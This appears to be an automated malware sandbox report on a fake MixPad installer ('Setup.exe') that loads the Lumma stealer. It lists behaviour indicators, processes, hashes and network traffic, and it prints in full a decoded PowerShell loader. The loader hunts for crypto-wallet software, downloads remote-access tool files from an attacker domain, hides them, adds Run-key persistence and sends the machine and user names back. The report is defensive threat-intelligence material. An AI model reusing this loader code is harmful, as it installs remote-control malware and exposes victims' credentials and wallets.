File name: Setup.exe

Full analysis: https://app.any.run/tasks/eb80fd15-fe98-4e9b-ab45-db606afef8e5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 23, 2024, 11:06:53
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: lumma, stealer, pastebin, loader, autoit
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5: 9F255C59CB7291F7170E4418A649BD8E
SHA1: 61FF59F20F18BD99847DEF7B88B3F8350D778DE3
SHA256: 22FBCD9BBA70FE43CCD1F1CA55B79C1D74238B7A3CACBFFAD165FC07E70D832B
SSDEEP: 98304:hdsv2DOl9kIq/tBgdD07yvaY5M0BUuc17BCxrvUMEvNa7bKPisuZLeUs7H3tdupn:ROY0hN+FIGI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 5000)
    • LUMMA has been detected (SURICATA)

      • msiexec.exe (PID: 3436)
    • Stealers network behavior

      • msiexec.exe (PID: 3436)
    • Actions looks like stealing of personal data

      • msiexec.exe (PID: 3436)
    • Steals credentials from Web Browsers

      • msiexec.exe (PID: 3436)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 5496)
      • msiexec.exe (PID: 3436)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5400)
      • powershell.exe (PID: 5496)
      • powershell.exe (PID: 4980)
    • LUMMA has been detected (YARA)

      • msiexec.exe (PID: 3436)
  • SUSPICIOUS

    • Creates file in the systems drive root

      • dllhost.exe (PID: 5000)
    • Starts application with an unusual extension

      • Setup.exe (PID: 6016)
      • msiexec.exe (PID: 3436)
    • The process executes Powershell scripts

      • msiexec.exe (PID: 3436)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 5496)
    • Starts POWERSHELL.EXE for commands execution

      • msiexec.exe (PID: 3436)
      • powershell.exe (PID: 5496)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 5496)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 5496)
    • Application launched itself

      • powershell.exe (PID: 5496)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 5496)
    • Checks whether the computer is part of a domain (POWERSHELL)

      • powershell.exe (PID: 4980)
    • Starts the AutoIt3 executable file

      • msiexec.exe (PID: 3436)
  • INFO

    • Checks supported languages

      • Setup.exe (PID: 4320)
      • Setup.exe (PID: 6016)
      • more.com (PID: 4128)
      • 6GZ64C.com (PID: 5316)
    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 5000)
    • Reads the machine GUID from the registry

      • Setup.exe (PID: 4320)
    • Reads the computer name

      • Setup.exe (PID: 4320)
      • more.com (PID: 4128)
      • Setup.exe (PID: 6016)
    • Create files in a temporary directory

      • Setup.exe (PID: 6016)
      • Setup.exe (PID: 4320)
      • more.com (PID: 4128)
      • msiexec.exe (PID: 3436)
    • The process uses the downloaded file

      • dllhost.exe (PID: 5000)
      • powershell.exe (PID: 5400)
    • Reads the software policy settings

      • msiexec.exe (PID: 3436)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5400)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5400)
    • Disables trace logs

      • powershell.exe (PID: 5496)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 5400)
    • Checks proxy server information

      • powershell.exe (PID: 5496)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4980)
    • Creates files or folders in the user directory

      • msiexec.exe (PID: 3436)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3436)
    • Reads Windows Product ID

      • 6GZ64C.com (PID: 5316)
    • Reads mouse settings

      • 6GZ64C.com (PID: 5316)
    • Reads CPU info

      • 6GZ64C.com (PID: 5316)
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:11:02 01:07:45+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 8
CodeSize: 4734464
InitializedDataSize: 6048256
UninitializedDataSize: -
EntryPoint: 0x468c62
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0017
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (Australian)
CharacterSet: Unicode
CompanyName: NCH Software
FileDescription: MixPad Multitrack Recording Software
FileVersion: 12.52+
ProductVersion: 12.52+
ProductName: MixPad
LegalCopyright: NCH Software
InternalName: MixPad
OriginalFileName: MixPad.exe
No data.
Total processes: 123
Monitored processes: 12
Malicious processes: 5
Suspicious processes: 1

Behavior graph

Process nodes (in graph order; "no specs" marks nodes without specific indicators): setup.exe (no specs), CMSTPLUA setup.exe (no specs), more.com (no specs), conhost.exe (no specs), #LUMMA msiexec.exe, powershell.exe (no specs), conhost.exe (no specs), powershell.exe, conhost.exe (no specs), powershell.exe (no specs), 6gz64c.com (no specs)

Process information

Fields per process: PID, CMD, Path, Indicators, Parent process
PID: 1668
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2828
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: more.com
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3436
CMD: C:\WINDOWS\SysWOW64\msiexec.exe
Path: C:\Windows\SysWOW64\msiexec.exe
Parent process: more.com
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows® installer
Exit code: 0
Version: 5.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
c:\users\admin\appdata\local\temp\dpwtrsonvrtk
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 3832
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4128
CMD: C:\WINDOWS\SysWOW64\more.com
Path: C:\Windows\SysWOW64\more.com
Parent process: Setup.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: More Utility
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\more.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ulib.dll
PID: 4320
CMD: "C:\Users\admin\Desktop\Setup.exe"
Path: C:\Users\admin\Desktop\Setup.exe
Parent process: explorer.exe
User: admin
Company: NCH Software
Integrity Level: MEDIUM
Description: MixPad Multitrack Recording Software
Exit code: 0
Version: 12.52+
Modules (images):
c:\users\admin\desktop\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
PID: 4980
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NOpr -eX BYPaSs -wiNdoWSt Hidd -e <encoded command; the report renders it decoded as follows>
$ofbw='hKcU:\SofTwAre\CLASsEs\'; $K2Tfz='c:\pRogRAM Files\'; $nSkF7=0; $584f=(gET-wMiOBJeCT -ClasS WiN32_cOmPUTERSysTem).pArTOfDomAin; $XTU8='hkcU:\sofTwAre\'; $KirH='HkLM:\soFtwArE\ClASses\'; $5tvZP=$eNv:LOcAlappdaTa+'\PROGRAms\';
$vjTA=@( $OfbW+'AOpP'; $ofbW+'keEpkEY'; $KirH+'BCvAuLT'; $5TVZp+'KeePkEy-DesKToP\keEpkEy DeskTop.eXE'; $xtU8+'REAL securITy\BCVAuLT'; $oFbW+'CyPheRock'; $5tvZP+'TrEzOR SUITE\trEZOr SUItE.exE'; $xtu8+'mICROsOft\wIndoWS\cUrrENTverSIoN\unInstALl\biTbOxAPp'; $5TvZp+'cypHERock CYsYNC\CYPhErock CYSynC.eXe'; $K2Tfz+'BiTbox\BItboX.ExE'; $oFbW+'oNeKEY-wAlLet'; $5tvzP+'keEVO-WALLET\KeEVo LInk.eXE'; $oFBW+'LIqUiDneTwoRk'; $oFBW+'treZoRSUItE'; $k2tFZ+'bloCKSTReaM\BlOcKstReaM GReeN\BLOCkstrEAM GreEn.exE'; $kIrH+'ledgerlive'; $Xtu8+'bITbOxApp'; $K2tFZ+'OnEkeY\oneKEy.exE'; $ofBw+'kEeVO'; $K2TfZ+'BC VaULT\BCvAULt.ExE'; $5Tvzp+'rAbBY-dESKToP\raBbY desktoP.Exe'; $K2TFZ+'Ledger LivE\LeDGEr lIVe.eXe'; );
$rzQa5=$VJTa.LENGth; IF ($584F) {$nSKf7=1} elSE { FoR ($gkXl=0; $gkXL -lT $rZqa5 -aNd $nskF7 -Eq 0; $gKxL++) { if (test-paTH $vJta[$GkxL]) {$nSKF7=1};};};
iF ($nSKF7 -EQ 1) { [nET.seRvIcePOINTmANagER]::sEcURitYpROtOcoL = [Net.SEcuRityPRotoColTyPe]::tLS12; $U9sOty='https://snowqueen.site/snowz/snow.zip'; $ytBd4S='DefragClient'; ChDIR $ENV:aPpdatA; $J8feqxrW=GEt-COmMAnD STarT-BitStraNSfer -ERRORactION SiLENTlycONTINuE; $WphbAOqW="{0}\{1}" -f $EnV:AppdatA, $ytBd4S;
TrY { New-iTEm -paTh $enV:APpDaTA -NAME $ytBd4S -iTeMTYpE 'directory'; Add-Type -ASSemblynAme SySteM.IO.CoMprEsSiON, sYSTem.io.COMPression.filESYSTem -eRRORaCtION SIlentlYcOnTINuE; $oTvQTmT=(CURl -Uri $U9sOty -UsEBASICPARSIng).cOnTeNt; $upK386=nEw-Object sYSTem.iO.MEMOrYsTrEAM; $upK386.wriTe($oTvQTmT, 0, $oTvQTmT.LENGtH); $upK386.sEEk(0, [SYSTeM.IO.seEkoriGin]::BEGiN) | ouT-NulL; $b1saqqQr=nEw-objEct sYsteM.IO.COmPrEsSIOn.ZIpArcHIvE($upK386, [sYStEm.Io.coMpREsSIon.ZIPaRcHIvEMODE]::Read); fOReACh($ZeZqsH in $b1saqqQr.entrIEs) { $BYuc8M="{0}\{1}" -f $WphbAOqW, $ZeZqsH.NaME; $63Y3rj5F=$ZeZqsH.opeN(); $F5YdW8F=[System.io.fILE]::CreaTe($BYuc8M); $63Y3rj5F.CopYto($F5YdW8F); $F5YdW8F.cLose(); $63Y3rj5F.cloSe();} $b1saqqQr.dIsPOsE(); $upK386.DisPoSE(); }
catch {New-iTEm -PATH $Env:aPpDAta -nAMe $ytBd4S -itemtype 'directory'; $Iu4Zn1='https://snowqueen.site/snowz/'; $tIVppkB=@('TCCTL32.DLL', 'remcmdstub.exe', 'msvcr100.dll', 'client32.exe', 'nsm_vpro.ini', 'nskbfltr.inf', 'pcicapi.dll', 'PCICHEK.DLL', 'HTCTL32.DLL', 'AudioCapture.dll', 'NSM.LIC', 'client32.ini', 'PCICL32.DLL'); IF ($J8feqxrW) { $tIVppkB | ForEACH-objECt { $G16Q4aU=$Iu4Zn1+$_; $JnsA5fxU=$WphbAOqW+'\'+$_; StaRt-bItSTRANsFeR -sOurCE $G16Q4aU -DESTINaTioN $JnsA5fxU; };} eLse { $tIVppkB | fOreach-OBjECt { $G16Q4aU=$Iu4Zn1+$_; $JnsA5fxU="{0}\{1}" -f $WphbAOqW, $_; $xQfy4Fes='bItsaDMIn.eXE /trAnSfer X5y6YJ /dOWnLoAD /PRiOrITy NOrmal '+$G16Q4aU+' '+$JnsA5fxU; & $xQfy4Fes;}; }; };
$6aLZwU=Get-ItEm $WphbAOqW -foRCe; $6aLZwU.AttRIBUTes='Hidden'; Cd $WphbAOqW; $PKaThxv4=$WphbAOqW, 'client32.exe' -JOin '\'; NeW-ItEMpRoPeRTy -PatH 'hkCu:\SOftwarE\MICRoSOft\WINDOWS\CurRenTveRSIoN\run' -nAMe $ytBd4S -VaLUe $PKaThxv4 -pRoPERTytype 'String'; sTaRT CLIEnT32.EXE; $32HaO=ps client32 -erroraCtiOn siLeNTLyCONtInue; $Sfb0="https://snowqueen.site/snows/recalling.php?cpnme=$Env:cOMputerNAME&usnme=$enV:UsErNAmE&param="; IF ($32HaO.id) { $qtfCD=$Sfb0+'pHqB'; Wget $qtfCD -usEBASICpArSInG;} else { $qtfCD=$Sfb0+'kzhU2'; Wget $qtfCD -UsebasicparSiNG;}; };
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 5000
CMD: C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Path: C:\Windows\SysWOW64\dllhost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: COM Surrogate
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll
PID: 5316
CMD: "C:\Users\admin\AppData\Roaming\6GZ64C.com" "C:\Users\admin\AppData\Roaming\QKZ2HX.csv"
Path: C:\Users\admin\AppData\Roaming\6GZ64C.com
Parent process: msiexec.exe
User: admin
Company: AutoIt Team
Integrity Level: HIGH
Description: AutoIt v3 Script (Beta)
Exit code: 0
Version: 3, 3, 15, 1
Modules (images):
c:\users\admin\appdata\roaming\6gz64c.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\psapi.dll
c:\windows\syswow64\user32.dll
PID: 5400
CMD: powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\HF28QJ06Y4TY885OYJH7SL.ps1"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: msiexec.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events: 18 287
Read events: 18 271
Write events: 16
Delete events: 0

Modification events

Process | Operation | Key | Name = Value
(4320) Setup.exe | write | HKEY_CURRENT_USER\SOFTWARE\NCH Software\MixPad\Software | SVar = LLIBControloff
(5000) dllhost.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer | SlowContextMenuEntries = 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(5496) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing = 0
(5496) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing = 0
(5496) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing = 0
(5496) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask = (empty)
(5496) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask = (empty)
(5496) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize = 1048576
(5496) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory = %windir%\tracing
(5496) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing = 0
Executable files: 1
Suspicious files: 2
Text files: 12
Unknown types: 0

Dropped files

PID | Process | Filename | Type
4128 | more.com | C:\Users\admin\AppData\Local\Temp\dpwtrsonvrtk | -
MD5: -
SHA256: -
3436 | msiexec.exe | C:\Users\admin\AppData\Roaming\QKZ2HX.csv | -
MD5: -
SHA256: -
4320 | Setup.exe | C:\Users\admin\AppData\Local\Temp\114d9e7b | image
MD5: 047000E95690F931B9FAADF4547FFD8A
SHA256: 3D536FB5D4D3B7AD2D3CE4827E46703483CACC5214D8C2F4220BC8D47E5BE7EC
6016 | Setup.exe | C:\Users\admin\AppData\Local\Temp\11acdc6b | image
MD5: 047000E95690F931B9FAADF4547FFD8A
SHA256: 3D536FB5D4D3B7AD2D3CE4827E46703483CACC5214D8C2F4220BC8D47E5BE7EC
6016 | Setup.exe | C:\Users\admin\AppData\Local\Temp\11cb7cf5 | binary
MD5: 8634AC2835A27ABF4B59A28E5A43EF9A
SHA256: 33B81DDD408703B7059EB33193634F6A648B410945995312A6FC08CC7DD349C9
5400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vvvtqdw5.ot1.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5400 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: BAD5A3EC3F7D4CD5EE2363B17E905324
SHA256: B7A40FBA08F044E4538557AEB35247E8A3C71EFD5FC3BAF79663490C41D6CEFB
5400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kc2iydey.ata.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z44eh4lq.ahs.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4980 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mlnpxge3.zax.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 20
TCP/UDP connections: 29
DNS requests: 13
Threats: 2

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | GET | 200 | 23.48.23.194:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
1596 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
- | - | GET | 200 | 104.20.3.235:443 | https://pastebin.com/raw/erLX7UsT | unknown | text | 619 b | shared
- | - | GET | 200 | 172.67.167.196:443 | https://silversky.club/4b882c8/script | unknown | text | 331 b | malicious
- | - | GET | 200 | 172.67.154.155:443 | https://zasa.r2cloudmikudau8.shop/runcl.bin | unknown | executable | 921 Kb | -
- | - | GET | 200 | 104.21.11.197:443 | https://snowqueen.site/calling.php?compName=DESKTOP-JGLLJLD | unknown | text | 8.93 Kb | -
- | - | GET | 200 | 104.21.6.29:443 | https://zasa.r2cloudmikudau8.shop/ldr_cp_sh | unknown | executable | 173 Kb | -
- | - | GET | 200 | 104.21.6.29:443 | https://zasa.r2cloudmikudau8.shop/clp_sh.32 | unknown | binary | 5.72 Mb | -
- | - | POST | 200 | 188.114.96.3:443 | https://mysticriver.shop/api | unknown | text | 16 b | -

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 23.48.23.194:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
1596 | svchost.exe | 23.48.23.194:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 23.48.23.194:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
- | - | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
1596 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
- | - | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 4.231.128.59, 40.127.240.158 | whitelisted
google.com | 142.250.185.142 | whitelisted
crl.microsoft.com | 23.48.23.194, 23.48.23.147, 23.48.23.177, 23.48.23.141, 23.48.23.143, 23.48.23.169, 23.48.23.158, 23.48.23.180 | whitelisted
www.microsoft.com | 184.30.21.171 | whitelisted
mysticriver.shop | 188.114.97.3, 188.114.96.3 | unknown
pastebin.com | 104.20.4.235, 104.20.3.235, 172.67.19.24 | shared
cdn1.pixel-story.shop | - | unknown
silversky.club | 172.67.167.196, 104.21.58.9 | malicious
zasa.r2cloudmikudau8.shop | 104.21.6.29, 172.67.154.155 | unknown
snowqueen.site | 104.21.11.197, 172.67.150.60 | unknown

Threats

PID | Process | Class | Message
3436 | msiexec.exe | A Network Trojan was detected | STEALER [ANY.RUN] Lumma Stealer TLS Connection
2192 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Online Pastebin Text Storage
No debug info